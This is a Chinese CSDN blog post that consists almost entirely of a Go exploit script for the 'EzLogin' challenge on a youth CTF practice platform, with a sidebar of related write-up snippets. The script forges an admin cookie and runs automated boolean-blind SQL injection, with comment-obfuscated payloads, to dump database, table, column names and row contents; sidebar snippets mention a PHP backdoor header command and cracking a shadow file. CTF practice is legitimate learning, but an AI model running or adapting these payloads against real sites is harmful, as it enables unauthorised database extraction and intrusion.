青少年CTF练习平台 EzLogin exp

最新推荐文章于 2024-07-20 17:56:58 发布
最新推荐文章于 2024-07-20 17:56:58 发布
阅读量268 收藏
点赞数 4
文章标签: iphone ios
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80395418/article/details/139363100
版权 
package main

import (
	"crypto/md5"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"io"
	"net/http"
	"strings"
)

func getMD5Hash(text string) string {
	hasher := md5.New()             // 创建一个新的MD5哈希对象
	hasher.Write([]byte(text))      // 写入要加密的字符串
	hash := hasher.Sum(nil)         // 计算哈希值
	return hex.EncodeToString(hash) // 将哈希值转换为十六进制字符串并返回
}

func encode(str string) string {
	json := fmt.Sprintf(`{"username":"%s","token":"%s","is_admin":1}`, str, getMD5Hash(str))
	cookie := base64.StdEncoding.EncodeToString([]byte(json))
	cookie = hex.EncodeToString([]byte(cookie))

	return cookie
}

func guessDatabaseLength(url string) int {
	fmt.Println("开始爆破数据库长度")
	//创立连接
	client := &http.Client{}
	a := 0
	for ; a <= 100; a++ {

		//exp
		s := fmt.Sprintf("admi'/**/or/**/length(database())=%d/**/#", a)

		//建立一个http请求
		req, err := http.NewRequest("GET", url, nil)
		if err != nil {
			fmt.Println("Error: ", err)
		}

		cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
		req.AddCookie(cookie)

		res, err := client.Do(req)
		if err != nil {
			fmt.Println("Error: ", err)
		}

		response, _ := io.ReadAll(res.Body)
		if strings.Contains(string(response), "@") {
			fmt.Println("数据库的长度是:", a)
			break
		}

	}

	return a
}
func getDatabase(url string, len int) string {
	fmt.Println("开始爆破数据库的名字")
	//创立http连接
	client := &http.Client{}
	result := ""
	for i := 0; i <= len; i++ {
		for a := 65; a <= 125; a++ {
			//exp
			s := fmt.Sprintf("admi'/**/or/**/ascii(substr(database(),%d,1))=%d/**/#", i, a)
			//建立一个http请求
			req, err := http.NewRequest("GET", url, nil)
			if err != nil {
				fmt.Println("Error: ", err)
			}
			cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
			req.AddCookie(cookie)
			res, err := client.Do(req)
			if err != nil {
				fmt.Println("Error: ", err)
			}

			fmt.Sprintf("Payload:i = %d a = %d", i, a)
			response, _ := io.ReadAll(res.Body)
			if strings.Contains(string(response), "@") {
				result = result + string(a)
				fmt.Printf("前%d个字母是:%s\n", i, result)
				break
			}
		}

	}
	return result
}

func guessTableNum(url, database string) int {
	client := &http.Client{}
	a := 0
	for ; a <= 1000; a++ {
		fmt.Println("开始爆破数据库中表的数量")
		s := fmt.Sprintf("admi'/**/or/**/%d/**/like/**/(Select/**/Count(Table_name)/**/From/**/Information_schema.tables/**/Where/**/Table_schema/**/like/**/'%s')#", a, database)

		//建立一个http请求
		req, err := http.NewRequest("GET", url, nil)
		//如果请求建立失败,打印报错
		if err != nil {
			fmt.Println("Error: ", err)
		}
		cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
		//在http请求头中加入cookie
		req.AddCookie(cookie)
		//发送请求
		res, err := client.Do(req)
		if err != nil {
			fmt.Println("Error: ", err)
		}
		//response接收返回后的页面
		response, _ := io.ReadAll(res.Body)
		if strings.Contains(string(response), "@") {

			break
		}

	}
	return a
}

func guessTablelength(url, database string, num int) {
	fmt.Println("开始爆破数据库中表的长度")
	client := &http.Client{}
	leng := 0

	for i := 0; i <= num-1; i++ {
		fmt.Println("正在爆破第", i+1, "张表的长度")
		for ; leng <= 1000; leng++ {
			s := fmt.Sprintf("admi'/**/or/**/(select/**/length(Table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'%s'/**/limit/**/%d,1)/**/like/**/%d/**/#", database, i, leng)
			req, err := http.NewRequest("GET", url, nil)
			if err != nil {
				fmt.Println("Error: ", err)
			}

			cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
			req.AddCookie(cookie)

			res, err := client.Do(req)
			if err != nil {
				fmt.Println("Error: ", err)
			}
			response, _ := io.ReadAll(res.Body)
			if strings.Contains(string(response), "@") {
				break
			}
		}
		fmt.Printf("第%d张表的长度是%d\n", i, leng)
		tableName := getTableName(i, leng, url, database)
		guessColumnNum(url, database, tableName)
	}

}

func getTableName(i, len int, url, database string) string {
	fmt.Println("开始爆破表名")
	client := &http.Client{}
	tableName := ""
	for index := 1; index <= len; index++ {
		fmt.Println("正在爆破表名的第", index, "个字母")
		for a := 65; a <= 122; a++ {
			s := fmt.Sprintf("admi'/**/or/**/(select/**/(ascii(substr((select/**/Table_name/**/from/**/information_schema.tables/**/where/**/table_schema='%s'/**/limit/**/%d,1),%d,1)))=%d)/**/#", database, i, index, a)
			req, err := http.NewRequest("GET", url, nil)
			if err != nil {
				fmt.Println("Error: ", err)
			}
			cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
			req.AddCookie(cookie)
			res, err := client.Do(req)
			if err != nil {
				fmt.Println("Error: ", err)
			}
			response, _ := io.ReadAll(res.Body)

			if strings.Contains(string(response), "@") {
				tableName = tableName + string(a)
				break
			}

		}
	}
	fmt.Printf("第%d个表的名字是%s\n", i+1, tableName)
	return tableName
}

func guessColumnNum(url, database, tablesName string) int {
	fmt.Printf("开始爆破%s表中表的字段的数量\n", tablesName)
	client := &http.Client{}
	a := 0
	for ; a <= 1000; a++ {

		s := fmt.Sprintf("admi'/**/or/**/%d/**/like/**/(Select/**/Count(column_name)/**/From/**/Information_schema.columns/**/Where/**/Table_schema/**/like/**/'%s'/**/and/**/table_name='%s')#", a, database, tablesName)

		//建立一个http请求
		req, err := http.NewRequest("GET", url, nil)
		//如果请求建立失败,打印报错
		if err != nil {
			fmt.Println("Error: ", err)
		}
		cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
		//在http请求头中加入cookie
		req.AddCookie(cookie)
		//发送请求
		res, err := client.Do(req)
		if err != nil {
			fmt.Println("Error: ", err)
		}
		//response接收返回后的页面
		response, _ := io.ReadAll(res.Body)
		if strings.Contains(string(response), "@") {

			break
		}

	}
	fmt.Printf("%s表中表的字段的数量是:%d\n", tablesName, a)
	getColumnleng(url, database, tablesName, a)
	return a
}

func getColumnleng(url, database, tablesName string, num int) {
	fmt.Println("开始爆破数据库中表的长度")
	client := &http.Client{}
	leng := 0

	for i := 0; i <= num-1; i++ {
		fmt.Println("正在爆破第", i+1, "个字段的长度")
		for ; leng <= 1000; leng++ {
			s := fmt.Sprintf("admi'/**/or/**/%d/**/like/**/(select/**/length(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'%s'/**/and/**/table_name/**/like/**/'%s'/**/limit/**/%d,1)/**/#", leng, database, tablesName, i)
			req, err := http.NewRequest("GET", url, nil)
			if err != nil {
				fmt.Println("Error: ", err)
			}

			cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
			req.AddCookie(cookie)

			res, err := client.Do(req)
			if err != nil {
				fmt.Println("Error: ", err)
			}

			response, _ := io.ReadAll(res.Body)
			if strings.Contains(string(response), "@") {
				break
			}
		}
		fmt.Printf("第%d个字段的长度是%d\n", (i + 1), leng)
		getColumnName(i, leng, url, database, tablesName)
	}

}

func getColumnName(i, len int, url, database, tablesName string) {
	fmt.Println("开始爆破字段名名")
	client := &http.Client{}
	ColumnName := ""
	for index := 1; index <= len; index++ {
		for a := 65; a <= 122; a++ {
			s := fmt.Sprintf("admi'/**/or/**/(select/**/(ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='%s'/**/and/**/table_name='%s'/**/limit/**/%d,1),%d,1)))=%d)/**/#", database, tablesName, i, index, a)
			req, err := http.NewRequest("GET", url, nil)
			if err != nil {
				fmt.Println("Error: ", err)
			}
			cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
			req.AddCookie(cookie)
			res, err := client.Do(req)
			if err != nil {
				fmt.Println("Error: ", err)
			}
			response, _ := io.ReadAll(res.Body)

			if strings.Contains(string(response), "@") {
				ColumnName = ColumnName + string(a)
				break
			}

		}

	}
	fmt.Printf("第%d个字段的名字是%s\n", i+1, ColumnName)

}

func getColumnContent(url, database, columnName, tablesName string) {
	fmt.Println("开始爆破字段内容,默认爆破前3行的前40个字母")
	client := &http.Client{}

	for hang := 0; hang <= 2; hang++ {
		fmt.Println("正在爆破第", hang+1, "行的内容")
		columnConten := ""
		for index := 1; index <= 40; index++ {
			a := 48
			for ; a <= 125; a++ { //字段名    库名.表名
				s := fmt.Sprintf("admi'/**/or/**/(select/**/ascii(substr((select/**/%s/**/from/**/%s.%s/**/limit/**/%d,1),%d,1))=%d)/**/#", columnName, database, tablesName, hang, index, a)
				req, err := http.NewRequest("GET", url, nil)
				if err != nil {
					fmt.Println("Error: ", err)
				}
				cookie := &http.Cookie{Name: "TOKEN", Value: encode(s), Path: "/"}
				req.AddCookie(cookie)
				res, err := client.Do(req)
				if err != nil {
					fmt.Println("Error: ", err)
				}
				response, _ := io.ReadAll(res.Body)

				if strings.Contains(string(response), "@") {
					columnConten = columnConten + string(a)

					break
				}

			}
			fmt.Printf("前%d个字母是%s\n", index, columnConten)

		}
		fmt.Printf("字段%s第%d行的内容是%s\n", columnName, hang+1, columnConten)
	}
}
func main() {
	url := "http://challenge.qsnctf.com:30978/home.php"
	fmt.Println("程序开始执行")
	lenDatabase := guessDatabaseLength(url)
	fmt.Println("database length:", lenDatabase)
	database := getDatabase(url, lenDatabase)
	fmt.Println("database:", database)
	tablesNum := guessTableNum(url, database)
	fmt.Printf("数据库%s中有%d张表\n", database, tablesNum)
	guessTablelength(url, database, tablesNum)

	var tablesName string
	var ColumnName string
	fmt.Println("请输入你想要查的表名")
	_, err := fmt.Scanf("%s", &tablesName)
	if err != nil {
	}
	fmt.Printf("请输入你想要查%s表中的字段的名称\n", tablesName)
	_, err = fmt.Scanf("%s", &ColumnName)
	if err != nil {
	}
	fmt.Printf("tableName: %s,ColumnName: %s\n", tablesName, ColumnName)
	getColumnContent(url, database, ColumnName, tablesName)
}
Yliken
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
2022年ctf强网青少年题目
09-16
2022年ctf强网青少年题目
青少年 CTF 练习平台:Misc(一)
Flag少侠的博客
05-24 6523
Bear(熊日解码)、表情包、神奇的压缩包、Whale、小光的答案之书、是我的 Hanser!、上号、多情、我们的秘密、仓鼠的窝
【Web】青少年CTF练习平台-文章管理系统
cq_tanyu的博客
02-21 1189
在这道题上面困了有一会儿,之前一直拿到的是假FLAG,所以简单记录一下 直接尝试用SQLmap跑 后在数据库word表的articles列 拿下FLAG: 得到假的FLAG 根据提示 尝试转换思路,用SQLmap执行shell 查找“flag” 发现目录,拿下FLAG
青少年CTF-文章管理系统
CTF
03-08 597
打开容器后发现好像是sql注入类的问题,先尝试查找注入点发现出现的flag的值竟然是错误的值。再查找带有flag的文件名,先用sqlmap跑一下,
青少年CTF训练平台-WEB-部分wp
SwBack的博客
04-04 2345
扫描发现备份文件 打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码 用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理指定format参数 新手的登录 使用提示的user账号登录之后抓包修改cookie为admin。发包,得到flag访问之后直接查看js
青少年CTF训练平台 Web-Easy PingMe02
xingjinhao123的博客
10-22 1533
青少年CTF训练平台 Web-Easy PingMe02
青少年ctf擂台挑战赛 2024 #round 1
04-16
青少年ctf擂台挑战赛 2024 #round 1
工匠杯-CTF(题目+exp+解题思路)
04-01
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值...
基于python的网络攻防平台CTF)设计与实现
07-30
该程序是经过CTFd,ctf平台进行改版的。 其主要实现的功能: 网络攻防演练系统是基于python中flask框架下平台,该平台借助于网上各种CTF靶场设计框架进行构想,搭建一个CTF解题模式为主的网络攻防平台。系统主要完成...
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
从微软发iPhone,聊聊企业设备管理
Hsiao的二进制生活
07-19 795
本文通过分析微软向员工发放iPhone 15的事件,深入探讨了企业设备管理(EMS)在中国大陆面临的挑战,尤其是“安卓”设备上Intune等方案的困境,指出了由于Google移动服务(GMS)缺失、Android Enterprise限制、应用市场限制、旁加载风险、网络连接问题、兼容性问题以及政策监管环境等因素造成的障碍,并提出了包括使用iOS设备、移动应用程序管理(MAM)和VDI解决方案来应对这些挑战,以确保企业数据安全和提高管理效率。
iMazing 3 换手机后苹果游戏数据还有吗 换iPhone怎么转移游戏数据
tubage202311的博客
07-19 693
iMazing提供了一种便捷的解决方案,帮助你在更换iPhone时轻松迁移游戏数据,确保你的游戏体验不受影响。本文将详细介绍换手机后苹果游戏数据还有吗,以及换iPhone怎么转移游戏数据,确保你能无缝继续你的游戏体验。iMazing是一款强大的第三方iOS设备管理软件,使用iMazing,你可以直接将游戏数据从旧iPhone转移到新iPhone,而无需进行整个设备的备份和恢复。然而,也有一些例外。如果你正在面临数据转移的困扰,我推荐你使用iMazing这款数据转移软件,下面是对这款软件的详细介绍。
详细说一下axios的特点
hexadecimal_001的博客
07-17 395
在浏览器中,Axios 提供了自动添加 CSRF (跨站请求伪造) 令牌的功能,以保护你的 API 免受恶意攻击。Axios 提供了取消正在进行的 HTTP 请求的能力。除了自动的 JSON 转换外,Axios 还允许你自定义请求和响应的转换逻辑。这可以通过配置请求和响应的转换器来实现,允许你进行更复杂的数据处理。Axios 的响应对象包含了非常丰富的信息,如状态码、状态信息、响应头、响应数据等。综上所述,Axios 因其易用性、灵活性、跨平台性以及强大的功能集,在前端开发中得到了广泛的应用。
iOS】——MRC
m0_73974920的博客
07-16 1219
内存管理的核心是引用计数器,用一个整数来表示对象被引用的次数,系统需要根据引用计数器来判断对象是否需要被回收。在每次 RunLoop 迭代结束后,都会检查对象的引用计数器,如果引用计数器等于 0,则说明该对象没有地方继续使用它了,可以将其释放掉。
鸿蒙开发 03 封装 @ohos/axios (最新深度封装)
最新发布
一名全栈小白的博客
07-20 225
鸿蒙开发 03 封装 @ohos/axios (最新深度封装)
iOS】isMemberOfClass&isKindOfClass
XY_Mckevince的博客
07-20 649
对NSObject API中的两个方法 isKindOfClass 和 isMemberOfClass 的实现进行了分析,分别从底层源码和调用结果两个角度验证
iOS】——TaggedPointer
m0_73974920的博客
07-17 830
在为了改进从32位CPU迁移到64位CPU的内存浪费和效率问题,在64位CPU环境下,引入了。旨在提高内存效率和运行性能,尤其针对小的、频繁使用的对象,如NSNumberNSDate, 和NSString等。在64位处理器上,每个指针占用8字节,而某些对象可能只包含少量数据,因此使用完整对象和指针来管理这些小对象可能造成不必要的内存消耗和性能开销。地址最低位也就是0位是TaggedPointer标志位第1-3位是类标志位第4-7位表示数据类型或字符串长度8-63位用来存储数据。
青少年ctf训练平台misc
05-26
推荐一个青少年CTF训练平台misc,可以尝试一下picoCTF,它是由卡内基梅隆大学开发的一个免费的CTF平台,主要面向初学者和青少年。picoCTF包含多个类别的题目,其中misc类别包括密码学、逆向工程、网络安全、二进制等多种类型的题目,涵盖面广,适合初学者学习CTF。同时,picoCTF平台还提供了在线的实验环境,方便学习者进行实践操作,加深对安全知识的理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yliken

你的鼓励就像月亮,照亮了在黑暗

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值